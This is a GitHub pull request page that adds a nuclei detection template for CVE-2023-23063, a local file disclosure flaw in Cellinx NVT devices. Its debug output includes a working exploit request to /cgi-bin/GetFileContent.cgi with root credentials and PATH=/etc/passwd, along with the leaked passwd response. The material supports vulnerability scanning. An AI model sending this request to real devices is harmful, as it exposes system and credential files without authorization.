Skip to content

Add CVE-2023-23063 (vKEV) #13396

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Merged
merged 3 commits into from
Sep 26, 2025
Merged

Add CVE-2023-23063 (vKEV) #13396

merged 3 commits into from
Sep 26, 2025

Conversation

@daffainfo
Copy link
Contributor

@daffainfo daffainfo commented Sep 24, 2025

Template / PR Information

Cellinx NVT v1.0.6.002b was discovered to contain a local file disclosure vulnerability via the component /cgi-bin/GetFileContent.cgi.

Template Validation

I've validated this template locally?

  • YES
  • NO

Debug


                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2023-23063] Dumped HTTP request for http://REDACTED/cgi-bin/GetFileContent.cgi?USER=root&PWD=D1D1D1D1D1D1D1D1D1D1D1D1A2A2B0A1D1D1D1D1D1D1D1D1D1D1D1D1D1D1B8D1&PATH=/etc/passwd

GET /cgi-bin/GetFileContent.cgi?USER=root&PWD=D1D1D1D1D1D1D1D1D1D1D1D1A2A2B0A1D1D1D1D1D1D1D1D1D1D1D1D1D1D1B8D1&PATH=/etc/passwd HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[DBG] [CVE-2023-23063] Dumped HTTP response http://REDACTED/cgi-bin/GetFileContent.cgi?USER=root&PWD=D1D1D1D1D1D1D1D1D1D1D1D1A2A2B0A1D1D1D1D1D1D1D1D1D1D1D1D1D1D1B8D1&PATH=/etc/passwd

HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Content-Type: text/plain
Date: Mon, 08 Feb 1971 09:57:31 GMT
Server: lighttpd/1.4.33
Set-Cookie: TRACKID=XXXXXXXXXXXXXXXXXXXXXXXX; Path=/; Version=1

root:XXXXXXXXXXX:0:0:Administrator:/:/bin/sh
nobody:*:99:99:Nobody:/:
[CVE-2023-23063:regex-1] [http] [high] http://REDACTED/cgi-bin/GetFileContent.cgi?USER=root&PWD=D1D1D1D1D1D1D1D1D1D1D1D1A2A2B0A1D1D1D1D1D1D1D1D1D1D1D1D1D1D1B8D1&PATH=/etc/passwd
[CVE-2023-23063:word-2] [http] [high] http://REDACTED/cgi-bin/GetFileContent.cgi?USER=root&PWD=D1D1D1D1D1D1D1D1D1D1D1D1A2A2B0A1D1D1D1D1D1D1D1D1D1D1D1D1D1D1B8D1&PATH=/etc/passwd
[CVE-2023-23063:status-3] [http] [high] http://REDACTED/cgi-bin/GetFileContent.cgi?USER=root&PWD=D1D1D1D1D1D1D1D1D1D1D1D1A2A2B0A1D1D1D1D1D1D1D1D1D1D1D1D1D1D1B8D1&PATH=/etc/passwd
[INF] Scan completed in 695.379375ms. 3 matches found.

@github-actions github-actions bot requested a review from pussycat0x September 24, 2025 16:03
@pussycat0x pussycat0x self-assigned this Sep 26, 2025
@pussycat0x pussycat0x added the Done Ready to merge label Sep 26, 2025
@DhiyaneshGeek DhiyaneshGeek removed the request for review from pussycat0x September 26, 2025 08:47
@DhiyaneshGeek DhiyaneshGeek merged commit 29d2099 into projectdiscovery:main Sep 26, 2025
3 checks passed
@algora-pbc
Copy link

algora-pbc bot commented Oct 2, 2025

🎉🎈 @daffainfo has been awarded $200 by ProjectDiscovery! 🎈🎊

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@DhiyaneshGeek DhiyaneshGeek DhiyaneshGeek approved these changes

Assignees

@pussycat0x pussycat0x

Labels

Done Ready to merge 💰 Rewarded

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

4 participants

@daffainfo @DhiyaneshGeek @ritikchaddha @pussycat0x